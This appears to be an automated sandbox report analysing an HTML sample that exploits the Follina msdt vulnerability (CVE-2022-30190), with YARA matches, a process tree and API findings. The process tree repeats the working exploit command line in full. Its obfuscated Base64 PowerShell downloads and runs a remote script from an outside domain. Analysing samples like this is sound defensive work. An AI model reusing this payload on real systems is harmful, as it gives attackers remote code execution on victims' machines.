Edit tour

Windows Analysis Report
1.html

Overview

General Information

Sample Name:	1.html
Analysis ID:	638689
MD5:	ea483ab89d8b9baf00b953f0636e0520
SHA1:	b0b952334f0d0195b06faed532170263f7fad6c2
SHA256:	5385a798d136365b644199359dc2662de3b0d6c5adc09e4cf9cada074e8a9338
Tags:	Follinahtml
Infos:

Detection

Follina CVE-2022-30190

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Microsoft Office Exploit Follina CVE-2022-30190

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5208 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\1.html MD5: C139654B5C1438A95B321BB01AD63EF6)

chrome.exe (PID: 4368 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)

msdt.exe (PID: 5808 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)

elevation_service.exe (PID: 5240 cmdline: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe MD5: AFD137B53BA091ACBA569255B16DF837)

ChromeRecovery.exe (PID: 3328 cmdline: "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system MD5: 49AC3C96D270702A27B4895E4CE1F42A)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
1.html	MAL_Msdt_MSProtocolURI_May22	Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190	Tobias Michalski, Christian Burkard	0x1970:$re1: location.href = "ms-msdt:
1.html	JoeSecurity_Follina	Yara detected Microsoft Office Exploit Follina / CVE-2022-30190	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.666871221.000001DED42A4000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190	Nasreddine Bencherchali, Christian Burkard	0x2530:$sa1: msdt.exe 0x2662:$sb2: IT_BrowseForFile=
0000000C.00000002.666068572.000001DED4010000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190	Nasreddine Bencherchali, Christian Burkard	0x23f0:$sa1: msdt.exe 0x242c:$sa1: msdt.exe 0x2984:$sa1: msdt.exe 0x3955:$sa1: msdt.exe 0x2560:$sb2: IT_BrowseForFile= 0x39ef:$sb2: IT_BrowseForFile=
Process Memory Space: msdt.exe PID: 5808	SUSP_PS1_Msdt_Execution_May22	Detects suspicious calls of msdt.exe as seen in CVE-2022-30190	Nasreddine Bencherchali, Christian Burkard	0x1c3d:$sa1: msdt.exe 0x4bf3:$sa1: msdt.exe 0xc5f0:$sa1: msdt.exe 0xe28c:$sa1: msdt.exe 0x11277:$sa1: msdt.exe 0x13e58:$sa1: msdt.exe 0x15f90:$sa1: msdt.exe 0x163f6:$sa1: msdt.exe 0x19b26:$sa1: msdt.exe 0x1c1e5:$sa1: msdt.exe 0x1f1d0:$sa1: msdt.exe 0x22f19:$sa1: msdt.exe 0x25caa:$sa1: msdt.exe 0x25cc7:$sa1: msdt.exe 0x25f72:$sa1: msdt.exe 0x260a6:$sa1: msdt.exe 0x22fb1:$sb2: IT_BrowseForFile= 0x25d61:$sb2: IT_BrowseForFile= 0x26140:$sb2: IT_BrowseForFile=

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8

Source: unknown

DNS traffic detected: queries for: clients2.google.com

Source: global traffic

HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C79029 lstrlenW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,

27_2_00C79029

Source: 1.html, type: SAMPLE	Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: 0000000C.00000002.666871221.000001DED42A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: 0000000C.00000002.666068572.000001DED4010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
Source: Process Memory Space: msdt.exe PID: 5808, type: MEMORYSTR	Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C8C8DF	27_2_00C8C8DF
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C951B0	27_2_00C951B0
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C87AF1	27_2_00C87AF1
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C9328B	27_2_00C9328B
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C802A1	27_2_00C802A1
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C94A67	27_2_00C94A67
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C9423B	27_2_00C9423B
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C944E5	27_2_00C944E5
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C8F428	27_2_00C8F428
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C93EC9	27_2_00C93EC9
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C956B9	27_2_00C956B9
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C87E39	27_2_00C87E39
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C947AC	27_2_00C947AC
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C8EFA0	27_2_00C8EFA0

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: String function: 00C7FE60 appears 43 times

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C79D31: CreateFileW,DeviceIoControl,CloseHandle,

27_2_00C79D31

Source: ChromeRecovery.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ChromeRecovery.exe.26.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 1.html

Virustotal: Detection: 32%

Source: C:\Windows\System32\msdt.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\1.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe	Process created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,1405708065703177602,11307067424223587467,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe	Process created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6299CFF5-1458.pma

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\229f6fa7-84c3-4f31-aa76-91ac60469b60.tmp

Jump to behavior

Source: classification engine

Classification label: mal56.expl.winHTML@35/121@3/5

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Mutant created: \BaseNamedObjects\Global\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C71209 LoadResource,LockResource,SizeofResource,

27_2_00C71209

Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe

File created: C:\Program Files\Google\Chrome\ChromeRecovery

Jump to behavior

Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next
Source: C:\Windows\System32\msdt.exe	Automated click: Next

Source: C:\Windows\System32\msdt.exe

File opened: C:\Windows\system32\MSFTEDIT.DLL

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe	Directory created: C:\Program Files\Google\Chrome\ChromeRecovery	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe	Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe	Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crx	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe	Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe	Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe	Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe	Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.json	Jump to behavior

Source:	Binary string: GoogleUpdateB231574670_unsigned.pdb` source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
Source:	Binary string: GoogleUpdateB231574670_unsigned.pdb source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C939A3 push ecx; ret		27_2_00C939B6
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C7FEA6 push ecx; ret		27_2_00C7FEB9

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C7E00C CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,

27_2_00C7E00C

Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe

File created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Jump to dropped file

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C73298 GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,

27_2_00C73298

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Temp\5208_646319911\LICENSE.txt

Jump to behavior

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C802A1 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

27_2_00C802A1

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_27-19226

Source: C:\Windows\System32\msdt.exe	Window / User API: threadDelayed 1341			Jump to behavior
Source: C:\Windows\System32\msdt.exe	Window / User API: threadDelayed 1519			Jump to behavior

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_27-20118

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C9525D VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

27_2_00C9525D

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C898C3 FindFirstFileExW,

27_2_00C898C3

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C7F243 IsDebuggerPresent,OutputDebugStringW,

27_2_00C7F243

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C741A3 CreateFileW,GetFileAttributesExW,OutputDebugStringW,CloseHandle,GetLastError,WriteFile,

27_2_00C741A3

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

27_2_00C7E00C

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe

Code function: 27_2_00C713D8 GetProcessHeap,

27_2_00C713D8

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C83E6C mov ecx, dword ptr fs:[00000030h]		27_2_00C83E6C
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C89665 mov eax, dword ptr fs:[00000030h]		27_2_00C89665

Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe	Code function: 27_2_00C7E00C CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,	27_2_00C7E00C
